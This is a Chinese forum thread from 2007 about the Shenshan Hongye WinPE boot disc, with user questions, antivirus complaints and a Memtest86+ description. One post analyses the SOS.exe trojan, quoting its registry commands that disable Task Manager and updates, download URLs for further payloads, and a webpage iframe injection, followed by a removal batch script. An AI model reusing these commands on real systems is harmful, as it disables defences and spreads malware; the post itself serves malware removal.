深山红叶启动光盘（WinPE＆PE Builder）讨论专帖[另开主题一律删除]

ibein21cn

v29版PE 外置程序"programs"必须放在根目录吗,如果不放在根目录，应当如何修改

太湖渔民

做过一次fat32转ntfs

ksj

原帖由 太湖渔民 于 2007-12-1 08:33 PM 发表



使用软件限制策略后发现：
1.某些软件不能用了，比如世界之窗。想知道这些被限制的原因！
2.局域网不能共享文件夹了，影响日常工作，想知道怎样取消相关策略？

我也是!

金蝶KIS行政事业版变成了教学演示版

David1220

原帖由 emca 于 2007-11-25 05:37 PM 发表
杀软是有针孔的安全套，虽然孔极小，但本质上是没用的东东！

世间还有更确切的比喻吗 ？哈哈！顶下！

underbider

请问V3.0可以在什么地方下载？

freesoft00

想知道这些被限制的原因！

你可以到 事件查看器 中找到是那条规则限制了软件的运行，然后删除，在刷新一下策略就好了

nmzbs

V30版运行过程中经常出现鼠标突然消失的现象，不知什么原因，请大师指点。

太湖渔民

卸载软件限制策略~~~~重启后相关问题消失！

恢复注册表数据，我的上述图片问题消失！

mangofish

深山红叶出品——极致优化杂交版
本版本结合了网络上流行的几种 Ghost 快速安装系统的优点（参考系统包括深度、电脑公司版、雨林木风等5个版本以及深山红叶袖珍PE工具箱、老毛桃PE平台等），集中各大克隆系统的优势杂交制作。杂交采取了静态揉合的方式，绝非二次封装，保证了系统的稳定性。
http://bbs.deepin.org/read.php?tid=467743

请问这是不是深山红叶的新出品呢？

原始地址无法下载，用迅雷下载到的md5是：bc482415609ea09891002cc9dee54c50 *GhostXP_OPtimized_Plus.iso
说明中的md5不一样：MD5: 4C43C526E16EB4364B7650A289E570E3

[ 本帖最后由 mangofish 于 2007-12-5 04:17 PM 编辑 ]

liqiang_baiyang

这个作品似乎早就有了，我在硬盘上保存也有一段时间了，不过没用过
红叶大师说过他装机从来不用GHOST版本
不过这样说明的系统我在我们学校的网安上的确看过，应该是个正品
但是不是红叶大师出的就不清楚了而且深度上的那张盘与我们学校网安上的盘子是否一样也不清楚

laomeng

看地址也是红叶学校的,下来看看使用情况如何

ksj

下来看看   学习学习!

太湖渔民

好像不是红叶的风格，杂交的盘是刻好试了试，还是不敢长期用~~~~~~~~

hzqp

大家好，两个月没来，已经是V30——1116版了，下载了一个。
贴子还没读完，两个半天才从1573读到1662页。还有20页。

一个问题不知大家是不是这样：
我不喜欢升级XP，但了红叶的说法，应用V30-安全设置-启用XP自动更新。
提示有13个要升级。下载也快。但就一个毛病，过一会儿 升级对话框就弹出来。弹出10多次。
原来XP升级不是这样的，是等到下载完了才弹出安装对话框。有点讨厌。

我运行 了：裸奔工具 中的1.移动介质病毒免疫补丁.EXE，2.软件限制策略.EXE，3.HOSTS.EXE，后，原来的AntiFVirus.exe ，RogouDead.exe就不能运行 了。这是一，如图一。
二是：XP注册表备份恢复 中的 ERUNTSET.CMD不能运行，如图二。

求助，怎么解决。

二、另求，我原来下载的红叶的不知是什么免疫（只要是红叶的，我统统都用上）。在系统中建了很多 0字节文件，这是什么免疫呀，现在有没有更新？谢谢！

[ 本帖最后由 hzqp 于 2007-12-8 04:40 PM 编辑 ]

hzqp

原帖由 emca 于 2007-11-22 10:43 AM 发表
病毒库，其实只需手工解压PE中的杀软，然后将你的病毒库拷贝到BASE目录中就行了。不需要任何技术。
卡巴斯基，最近在我的测试中屡屡失手，看来是不能用的了。
昨天有公司专门送了一套巡洋舰杀软，网络版的，今 ...

同感！

瑞星 （学校300多台电脑公私都有 一年来一直用瑞星，没出现任何大的问题，当然学校计算机出问题的主要原因是U盘，AUTORUN.INF,
一年中三次中毒，一次是SXS.EXE，一次是RavBin.exe,这次2007年11月 是SOS.EXE。而这三个病毒的危害有两个，一是ARP欺骗，阻塞网络，二是删除备份的系统文件*.GHO。学校的电脑少数配有光驱，所以装机麻烦。

在网上查了一下，SOS.EXE 11月9日就有报道。可能出现的还要早。但升级瑞星到最新，不能查杀，又把病毒原文件传给瑞星，也不了了之。又下载 卡巴斯基，升级到最新版，还是不能查杀。

顺便把自己给别人装机时收集的14种病毒放进去，用在线查毒测试几款杀软。结果如下。

金山，能查11种；
江民，能查10种；
卡巴，能查10种；但不认识SOS.EXE，
瑞星，能查出8种，原来一直觉得瑞星最好，是在没有病毒的时候。有病毒时他妈的一个都没用。
诺顿，不能在线查，说是IE没开启动ACTIVEX或脚本，我的电脑上了一年的网，会没开启吗？还是耐着性子全部开了，结果它说还是没有开。算了。在线是别查了。

查毒的结果，这11种都是木马，难道木马不是病毒吗？再用网上盛传“最强杀木马的AVG Anti-Virus”结果，它只认识4种。
出现了一个悖论，14种病毒或是木马，但杀软只认10种，另4种就算木马吧，结果杀木马软件说，他们是病毒，我们不管。
杀木马软件只认识4种，那10种应该是病毒吧，结果杀软说他们不是病毒，是木马，我们不管。真他妈的统统废物。

我在想，如果wuyou的高手们联合起来成立一家杀病毒公司，上面这些自以为全球最有名的杀软不全饿死才怪。

我是语文老师，爱好电脑。一年来给别的办公室装的电脑，只要建了“AUTORUN.INF”目录进行免疫的，一次没中毒，其实防病毒就是这样简单（当然这是在这里跟红叶等高手学的一点皮毛）而这一年中，所遇到10多种的都是通过U盘自运行进行病毒（木马）传播的。

另一个问题，
学计算机的人装电脑和玩电脑的人装电脑装法上不一样。因为学电脑的是科班出身，自然有科班的方法，装系统，装杀软。
而免疫，则不是他们的事，如果免疫了，那他们还干什么？学校三个机房的电脑全部感染了SOS.EXE, 管电脑的说，明天加班，如果免疫了，他们就没机会加班了，自然也就没有加班费了。其实学校的电脑的C盘都是硬件还原的，如果简单的免疫一下，他们会一直没事。如果他们给别人的电脑进行了免疫，就再没有人找他们了。那么学计算机就没有用了，计算机专家也就不重要了。这是我的理解。

关于安装杀软，还有与红叶不同的两点。
红叶说的给系统免疫，IE过滤，这对一般人来说难了点。再者，现在的的网络，弹出对话框无处不在。一般人看都没看，连着点，电脑里不知安装了多少乱七八糟的东西。而这些东西都加到“启动”中，速度自然就慢。电脑就像摩托车，只要是个人，给他钥匙他就会骑，一般人什么都不知道，就知道IE，上网。你能要求他什么？
二是对于一般人，觉得电脑还是装一个杀软的好，就像门一定要安一把锁一样，能锁住什么呢？但还是安上一把放心些。
讲个真实的事，二十年前，我在一乡级初中，学校20多个老师，星期六（那时还是只休息一天）回家时没一个人锁门，两年时间，也没听说谁丢过东西。

关于未来，我的想法是把电脑做成电视一样，系统不就安全了吗？系统固化，移动设备保存数据。
我的21寸的电视用了17年了，共修过3次。而我的电脑，再怎么一年也要重装一次系统。

[ 本帖最后由 hzqp 于 2007-12-8 03:38 PM 编辑 ]

quiz

原帖由 emca 于 2007-11-22 10:43 AM 发表
但我认定一个死理：把安全寄希望于杀软的，一定是猪头！其实，保持系统最新更新、做一些必需的安全配置和备份，技术性要求并不高，小学文化程度足矣，但却可以起到比装杀软更好的预防效果。宁可花费无数时间升级、杀毒地折腾，却不愿意花十分钟学习、花五分钟设置，你说这类人不是猪头是什么？！

这话说得就过了。你是高手，知道该学什么，要学的东西在哪里，也许不经意间觉得很简单。可是对于刚入门的人来说，网上的资源浩如烟海，不要说十分钟，花上十个
十分钟都不一定搞明白该学什么，更不用说学了。很简单的例子，光看当前这个帖子十分钟能看几页？你后面给的裸奔工具，对于你所说的小学文化程度的人来说完全就是
些黑盒子，要搞明白都干了些什么，十分钟够吗？何况他根本不知道到哪里去学习才能知道这些工具干了些什么。
不怕你笑话，我本人就是这样一个人。我在网上花了不止一百个十分钟想知道怎样配置自己的系统才能更安全，可是到现在还是一片茫然。
你既然说了，“花十分钟学习，五分钟设置”就可以了，简直是天大的喜讯，就请你指点一下到哪里学习吧。我很愿意花时间学习，哪怕是花十小时学习，花五十分钟设置
也毫无问题。

chinajy

感觉关于NTFS分区的读写工具太弱，是否可以加强一下，偶不想用别人的dos工具箱哦。

ncne

内存检测工具中的Memtest86是一款相当不错的工具，其他的检测软件只能检测基本参数的情况下，Memtest86+ 凭借其超细小的linux核心而可以对几乎全部内存空间进行检测。除了自身运行时候占用的大约60-70KB外，就算你拥有4GB的内存空间，它也能全面检测完整。

　　Memtest86+是x86-secret小组在Chris Brady开发的Memtest86的基础上，进行增强而得来的一款Linux核心内存检测工具，就算许多内存经销商也是利用它来检测内存。过去的15个月没有更新之后，1月14日再度放出更新后的版本，目前版本为V1.70。

　　Memtest86+ 1.70的更新部分主要是修正原来的旧版软件，在新硬件平台上的错误与瑕疵。主要包括修正对未知芯片组与AMD K8处理器系统的检测错误、加入新的DMI Polling功能，增加了对新硬件的支持。

　　新增加的硬件支持包括过去一年里上市发布的处理器、芯片组产品，包括：Intel Core/Core2 Solo/Duo/Quad/Extreme处理器、192/384KB二级缓存的Intel处理器、AMD Turion 64 X2处理器、AMD K8处理器与DDR2内存、FB-DIMM内存、ALi CyberAladdin-T芯片组、ATI Radeon Xpress 3200芯片组、Intel i975X/P965/Q965/Q963芯片组等等。



　　Memtest86+为了尽可能腾空内存空间以方便检测，采用的是采用Linux核心，故此需要纯dos环境或者以它生成的启动光盘、软盘来启动系统才能使用。利用软驱或光驱启动系统的方式能获得最大的检测范围，而用纯dos环境下启动的话，dos自身还需要占用一定的空间才能进行工作。更多详细消息参阅：[ Memtest86+主页]。

** Memtest86+ V1.70 (01/14/2007) **

• Download - Pre-Compiled Bootable ISO (.gz)
• Download - Pre-Compiled Bootable ISO (.zip)
  
  
• Download - Pre-Compiled Bootable Binary (.gz)
• Download - Pre-Compiled Bootable Binary (.zip)
  
  
• Download - Pre-Compiled EXE file for USB Key (Pure DOS)
  
  
• Download - Pre-Compiled package for Floppy (DOS - Win)

　　进入下载页面后，可以按需要选择相应的下载连接，选择对应的下载。

[ 本帖最后由 ncne 于 2007-12-10 09:17 PM 编辑 ]

flyingsand

\PROGRAMS\WINTOOLS\安全设置\ANTIFVIRUS.EXE里的批处理以下语句，参数/s前没空格，无效。

reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths"/s |find "%choice%\*\*.*"&& goto cerror4

wfywyy

原帖由 flyingsand 于 2007-12-12 04:03 PM 发表
\PROGRAMS\WINTOOLS\安全设置\ANTIFVIRUS.EXE里的批处理以下语句，参数/s前没空格，无效。

细心，赞一个

tousy

红叶发出的“裸奔工具”中貌似有误吧？（下载见本贴16365楼）

在“软件限制策略”包中，运行时导入了注册表文件“安全加强.reg”，

该文件删除HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID下六个注册表项来限制ActiveX脚本运行。

其中有一句注释：“ 要恢复时，请删除下面每行前面的 - 号再重新导入注册表即可！”，

但事实上运行这个“软件限制策略”后，按注释恢复这六个注册表项，ActiveX组件还是不能正常使用的。

还请红叶更正……

[ 本帖最后由 tousy 于 2007-12-13 08:18 AM 编辑 ]

liqiang_baiyang

昨天装了这个GHOST系统，看样子是红叶大师出的，风格很像，再说是我们学校网安上的，错的几率不大，而且用起来挺好的，页面很漂亮，暂用资源也很少。

sheer

用v30做多安装系统（40个）合盘后，可以进入pe，但是无法加载外置程序，请教红叶大师和各位高手

jmhcxh

求v30 安装到U盘的方法

hzqp

求助：红叶在ROGUEDEAD.EXE 中加入对SOS.exe木马病毒的免疫，
原因：最近（11月中旬到今天）本县城许多电脑都感染了SOS.exe病毒。两个校园网中都有病毒，且病毒会发出ARP攻击。并复制SOS.exe到其他电脑隐藏的盘和完全共享的盘中去。我想这个病毒又会和去年的熊猫烧香一样，为害时间不短。
病毒特征：SOS.exe病毒和 熊猫烧香 有很多相似性。
         1.删除系统备份文件GHO。
         2。中止杀软，当然现在的杀软也太弱智了，不怪病毒。
         3。修改系统时间，改为1999或2000年不定。
         4。禁用“任务管理器”，“资源管理器”一打开就关闭，WINRAR程序 一打开就关闭。以致不能查看进程和隐藏文件。这点比熊猫还厉害。
         5。局域网中 发出ARP攻击，这点网上好像还没人说。但我们局域网中中毒的电脑都发出ARP攻击。
         6。虽然也属于auToRun.inf类的病毒，但观察发现，U盘并不是SOS传播的唯一途径，我重装系统的一些电脑并没有用过U盘，另一个途径应该是上网。
         7。SOS把注册表项删除，导致你进入安全模式就蓝屏。

病毒行为：
1、程序运行后，释放文件：
%System%\Systom.exe
%System%\auToRun.inf
并在磁盘各个分区释放文件sos.exe和auToRun.inf
2、执行以下命令，修改注册表：
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate" /v
　　　　DisableWindowsUpdateAccess /t REG_dword /d 00000001 /f　//禁用系统自动升级
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v
　　　　DisableTaskMgr /t REG_dword /d 00000001 /f　　　　　　　//禁用任务管理器
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\EXPlorer\Advanced" /v Hidden /t
　　　　reg_dWord /d 00000000 /f //隐藏文件
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt
　　　　/t reg_dword /d 00000001 /f //隐藏扩展名
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden
　　　　/t reg_dword /d 00000000 /f //隐藏文件
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL"
　　　　/v CheckedValue /t REG_SZ /d 0 /f //隐藏文件
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN"
　　　　/v CheckedValue /t REG_dword /d 00000002 /f //隐藏文件
3、下载文件：
http://*****/1.txt
http://*****/2.txt
http://*****/3.txt
其中1.txt内容为：
http://*****/mh.exe
http://*****/ok.exe
http://*****/Server.exe
http://*****/uc.exe
http://*****/t/servere.exe
下载以上文件并重命名为?svchs0t.exe复制到系统目录%System%下 //?为从0开始数字
其中2.txt内容为：
360安全卫士
卡巴
瑞星
麦咖啡
NOD32
木马
防火墙
专杀工具
4、监控并关闭含有“病毒、木马、检测、wpe”等字符的窗体
5、在磁盘中所有网页文件尾部插入框架代码链接网马地址：
　　　　　<IfrAmE src=http://*****/index.htm width=50 height=0></IfrAmE>index.htm文件内容与网马利用漏洞

网上的一种半手动杀毒的方法：
原贴：http://hi.baidu.com/%D2%E4%C1%D6%D7%D3/blog/item/831de9c4578cfbc839db49a8.html
sos.exe是一个木马病毒，用自编一个批处理专杀工具就可以清除。sos.exe病毒在运行后将systom.exe、sos.exe、autorun.inf复制到系统目录下，可以通过U盘传染。sos.exe是：“自动运行木马下载器变种YWS（Trojan.DL.Win32.Autorun.yws）”病毒。同时sos.exe病毒在系统注册表中添加启动项实现自动启动。病毒禁用任务管理器并且隐藏病毒文件，给手工清除带来麻烦。当用户浏览被病毒修改的文件时，会自动连接到指定的网址下载其它木马程序。

把下面代码保存来.bat，运行就可以。
-sos.exe 病毒专杀批处理--
@echo off
title 忆林子
color 0a
echo.
echo                                    该病毒资料
echo    瑞星将该病毒定义为：Worm.Win32.DownLoad.b
echo.
echo    该病毒建立的包括的源文件如下:
echo.
echo    病毒文件全路径                      大小(字节)
echo    c:autorun.inf                      159
echo    c:sos.exe                          26,624
echo    c:WINDOWSsystem32Autorun.inf     159
echo    c:WINDOWSsystem32Systom.exe      26,624
echo    其它所有分区:autorun.inf           159
echo    其它所有分区:sos.exe               26,624
echo.
echo     autorun.inf文件里的内容
echo.
echo      [AutoRun]
echo.
echo      open=sos.exe
echo      shellopen=打开(^&O)
echo      shellopenCommand=sos.exe
echo      shellopenDefault=1
echo      shellexplore=资源管理器(^&X)
echo      shellexploreCommand=sos.EXE
echo.
echo   该病毒的后果:
echo   你的杀毒软件会无法打开,另外你的系统时间会被修改成2000年,无法显示隐藏文件
echo   另外，该病毒会把注册表项删除，导致你进入安全模式就蓝屏。
echo   可能还有其它的情况,我这里就不详细说明了.
echo.
ECHO   注意：该病毒会将你的系统时间修改为2000年，而这个杀毒程序的会将你的时间
echo   修改为2007年，你如果是在2007年使用这个的话，系统时间就不用修改了，否则
echo   杀毒后请自己重新设置系统时间。
echo.

echo.
set /p tmp=以上是该病毒的信息，如果要清除该病毒，请回车键开始杀毒...

rem 结束病毒进程
for %%d in (sos.exe,Systom.exe,reg.exe,iexplore.exe) do (
   taskkill /im %%d /f
   cls
)

rem 把时间改成2007年
FOR /F "eol=; tokens=1,2,3 delims=- " %%i in ('date /t') do (
   date 2007-%%j-%%k
)

rem 去除病毒源文件的 系统、隐藏、只读 属性,然后删除它们。
for %%d in (Autorun.inf,Systom.exe) do if exist "%systemroot%system32%%d" (
   attrib -s -h -r "%systemroot%system32%%d"
   del "%systemroot%system32%%d" /q
)
rem 添加进入安全模式的注册表项
reg add "HKLMSYSTEMControlSet001ControlSafeBootMinimal" /ve /d DiskDrive /f
reg add "HKLMSYSTEMControlSet001ControlSafeBootNetwork" /ve /d DiskDrive /f
reg add "HKLMSYSTEMControlSet003ControlSafeBootMinimal" /ve /d DiskDrive /f
reg add "HKLMSYSTEMControlSet003ControlSafeBootNetwork" /ve /d DiskDrive /f
reg add "HKLMSYSTEMCurrentControlSetControlSafeBootMinimal" /ve /d DiskDrive /f
reg add "HKLMSYSTEMCurrentControlSetControlSafeBootNetwork" /ve /d DiskDrive /f
cls

rem 解除对任务管理器的禁用
reg delete "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v DisableTaskMgr /f

rem 解除禁用Windows更新程序
reg delete "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWindowsUpdate" /v DisableWindowsUpdateAccess /f

rem 添加显示隐藏文件的注册表项
reg add "HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL" /f
reg add "HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenNOHIDDEN" /v Text /d "@shell32.dll,-30501" /f
reg add "HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL" /v CheckedValue /t reg_dword /d 1 /f
reg add "HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL" /v DefaultValue /t reg_dword /d 2 /f
reg add "HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL" /v HelpID /d "shell.hlp#51105" /f
reg add "HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL" /v HKeyRoot /t reg_dword /d 2147483649 /f
reg add "HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL" /v RegPath /d "SoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced" /f
reg add "HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL" /v Text /d "@shell32.dll,-30500" /f
reg add "HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL" /v Type /d "radio" /f
reg add "HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL" /v ValueName /d "Hidden" /f

reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced" /v Hidden /d 1 /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced" /v HideFileExt /d 0 /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced" /v ShowSuperHidden /d 1 /f

rem 删除病毒添加的启动项
for %%f in (crsss) do (
   reg delete "HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun" /v %%f /f
)

rem 删除其它盘根目录下的病毒文件
for %%f in (autorun.inf,sos.exe) do (
   for /D %%d in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
     if exist %%d:%%f (
       attrib -s -h -r %%d:%%f
       del %%d:%%f /q
     )
   )
)

rem 删除病毒在注册表中添加的关联
if exist test.忆林子 del test.忆林子
reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options">test.忆林子
for /f "tokens=* delims= skip=4" %%j in (test.忆林子) do (
    reg delete "%%j" /v debugger /f
    cls
    if exist test.忆林子 del test.忆林子

    echo.
    echo       正在清除由病毒添加的注册表项,请稍候...
    echo.

)
if exist test.忆林子 del test.忆林子
reg add "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsYour Image File Name Here without a path" /v Debugger /d "ntsd -d" /f
cls

color a0

echo.
echo       病毒清除完毕，按回车键开始解决分区无法双击打开的问题.
echo.

set /p test=
cls
@echo   off
title 忆林子--解决分区无法打开
color a0
rem 删除引起磁盘无法双击打开的autorun.inf文件
for /d %%i in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do if exist %%i:autorun.inf (
   cacls %%i:autorun.inf /c /e /p everyone:f
   attrib -s -h -r %%i:autorun.inf
   del %%i:autorun.inf /q
)
rem 进行磁盘检查，恢复双击打开功能
for /d %%i in (d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do if exist %%i: chkdsk %%i: /f /x
cls
color ec

echo.
echo                 操作结束,按回车键退出该程序...
echo.

set /p temp=
:exit
exit

试了一下，这个方法还行，能清除系统中的病毒，并修复注册表。能打开任务管理器，资源管理器，WINRAR，但不能清除 中过毒的文件。

特此求助：红叶高手在ROGUEDEAD.EXE 中加入针对SOS.exe木马病毒的免疫。发一个新版的ROGUEDEAD.EXE给大家。谢谢！！！

祝红叶高手圣诞快乐！

附：SOS病毒原文件，非高手勿下！！！
后果自负

[ 本帖最后由 hzqp 于 2007-12-15 11:43 AM 编辑 ]

hzqp

另一建议：

USBKiller(U盘病毒专杀工具) V2.2 b1119  这个软件有两个好处，一是小，二是随机启动后，当有U盘插入时检查是否有Autorun.inf文件存在，如果有，则自动删除。虽然它并不能杀病毒，木马等。但U盘的Autorun.inf如果能清理，起码可以减少一半的传播机会。因为U盘成了数据移动的主要工具了。



红叶是否能把它这点借鉴过来呢？

这样用户心里也踏实许多。

flyingsand

不明白你说借鉴什么，这个软件红叶盘中已收藏，再说，自从用了红叶的阉割方法之后，一向无视U盘病毒了。

beastwars

请问我下载的V30版本的镜像文件，我想从U盘（+读卡器）方式启动的话，需要对U盘做什么处理，然后还要怎么设置？

awenly501

好东西啊。。。。。。。。。。。。。。

嘉林

这帖好强，1644页，16440楼。慢慢学习。